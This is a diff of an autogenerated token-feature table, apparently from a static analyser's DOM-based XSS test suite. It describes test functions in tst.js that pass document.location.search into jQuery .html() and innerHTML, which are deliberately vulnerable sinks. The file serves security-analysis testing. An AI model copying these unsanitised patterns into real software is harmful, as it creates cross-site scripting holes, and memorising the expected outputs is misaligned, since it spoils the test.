| enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:24 | $("#foo ... source) | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:24 | $("#foo ... source) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:24 | exceptional return of $("#foo ... source) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:24 | exceptional return of $("#foo ... source) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:24 | exceptional return of $("#foo ... source) | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:24 | exceptional return of $("#foo ... source) | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:455:3:455:24 | exceptional return of $("#foo ... source) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:455:5:455:10 | "#foo" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:455:5:455:10 | "#foo" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:455:5:455:10 | "#foo" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17714,6 +123066,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:455:5:455:10 | "#foo" | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | | autogenerated/Xss/DomBasedXss/tst.js:455:5:455:10 | "#foo" | enclosingFunctionName | ansiToHTML | | autogenerated/Xss/DomBasedXss/tst.js:455:5:455:10 | "#foo" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:455:13:455:16 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:455:13:455:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:455:13:455:16 | html | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:455:13:455:16 | html | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:455:13:455:16 | html | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:455:18:455:23 | source | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:455:18:455:23 | source | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:455:18:455:23 | source | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17721,6 +123078,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:455:18:455:23 | source | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | | autogenerated/Xss/DomBasedXss/tst.js:455:18:455:23 | source | enclosingFunctionName | ansiToHTML | | autogenerated/Xss/DomBasedXss/tst.js:455:18:455:23 | source | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:3 | $ | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:3 | $ | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:11 | $("#foo") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:11 | $("#foo") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:11 | $("#foo") | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:11 | $("#foo") | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:11 | $("#foo") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:11 | exceptional return of $("#foo") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:11 | exceptional return of $("#foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:11 | exceptional return of $("#foo") | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:11 | exceptional return of $("#foo") | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:11 | exceptional return of $("#foo") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:16 | $("#foo").html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:16 | $("#foo").html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:16 | $("#foo").html | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:16 | $("#foo").html | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:16 | $("#foo").html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:43 | $("#foo ... ource)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:43 | $("#foo ... ource)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:43 | $("#foo ... ource)) | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:43 | $("#foo ... ource)) | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:43 | $("#foo ... ource)) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:43 | exceptional return of $("#foo ... ource)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:43 | exceptional return of $("#foo ... ource)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:43 | exceptional return of $("#foo ... ource)) | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:43 | exceptional return of $("#foo ... ource)) | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:456:3:456:43 | exceptional return of $("#foo ... ource)) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:456:5:456:10 | "#foo" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:456:5:456:10 | "#foo" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:456:5:456:10 | "#foo" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17728,6 +123115,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:456:5:456:10 | "#foo" | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | | autogenerated/Xss/DomBasedXss/tst.js:456:5:456:10 | "#foo" | enclosingFunctionName | ansiToHTML | | autogenerated/Xss/DomBasedXss/tst.js:456:5:456:10 | "#foo" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:456:13:456:16 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:456:13:456:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:456:13:456:16 | html | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:456:13:456:16 | html | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:456:13:456:16 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:456:18:456:27 | ansiToHtml | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:456:18:456:27 | ansiToHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:456:18:456:27 | ansiToHtml | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:456:18:456:27 | ansiToHtml | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:456:18:456:27 | ansiToHtml | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:456:18:456:34 | ansiToHtml.toHtml | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:456:18:456:34 | ansiToHtml.toHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:456:18:456:34 | ansiToHtml.toHtml | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:456:18:456:34 | ansiToHtml.toHtml | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:456:18:456:34 | ansiToHtml.toHtml | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:456:18:456:42 | ansiToH ... source) | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:456:18:456:42 | ansiToH ... source) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:456:18:456:42 | ansiToH ... source) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17735,6 +123137,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:456:18:456:42 | ansiToH ... source) | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | | autogenerated/Xss/DomBasedXss/tst.js:456:18:456:42 | ansiToH ... source) | enclosingFunctionName | ansiToHTML | | autogenerated/Xss/DomBasedXss/tst.js:456:18:456:42 | ansiToH ... source) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:456:18:456:42 | exceptional return of ansiToH ... source) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:456:18:456:42 | exceptional return of ansiToH ... source) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:456:18:456:42 | exceptional return of ansiToH ... source) | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:456:18:456:42 | exceptional return of ansiToH ... source) | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:456:18:456:42 | exceptional return of ansiToH ... source) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:456:29:456:34 | toHtml | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:456:29:456:34 | toHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:456:29:456:34 | toHtml | enclosingFunctionBody | source document location search $ #foo html source $ #foo html ansiToHtml toHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:456:29:456:34 | toHtml | enclosingFunctionName | ansiToHTML | +| autogenerated/Xss/DomBasedXss/tst.js:456:29:456:34 | toHtml | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:456:36:456:41 | source | CalleeFlexibleAccessPath | ansiToHtml.toHtml | | autogenerated/Xss/DomBasedXss/tst.js:456:36:456:41 | source | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:456:36:456:41 | source | calleeImports | ansi-to-html | @@ -17744,6 +123156,112 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:456:36:456:41 | source | enclosingFunctionName | ansiToHTML | | autogenerated/Xss/DomBasedXss/tst.js:456:36:456:41 | source | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:456:36:456:41 | source | receiverName | ansiToHtml | +| autogenerated/Xss/DomBasedXss/tst.js:459:1:459:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:459:1:459:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:459:1:459:0 | this | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:459:1:459:0 | this | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:459:1:459:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:459:1:468:1 | 'arguments' object of function domMethods | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:459:1:468:1 | 'arguments' object of function domMethods | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:459:1:468:1 | 'arguments' object of function domMethods | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:459:1:468:1 | 'arguments' object of function domMethods | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:459:1:468:1 | 'arguments' object of function domMethods | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:459:1:468:1 | exceptional return of function domMethods | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:459:1:468:1 | exceptional return of function domMethods | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:459:1:468:1 | exceptional return of function domMethods | enclosingFunctionBody | source document location search table document getElementById mytable table innerHTML source row table insertRow 1 row innerHTML source cell row insertCell cell innerHTML source | +| autogenerated/Xss/DomBasedXss/tst.js:459:1:468:1 | exceptional return of function domMethods | enclosingFunctionName | domMethods | +| autogenerated/Xss/DomBasedXss/tst.js:459:1:468:1 | exceptional return of function domMethods | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:459:1:468:1 | functio ... OT OK\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:459:1:468:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:459:1:468:1 | functio ... OT OK\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:459:1:468:1 | return of function domMethods | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, 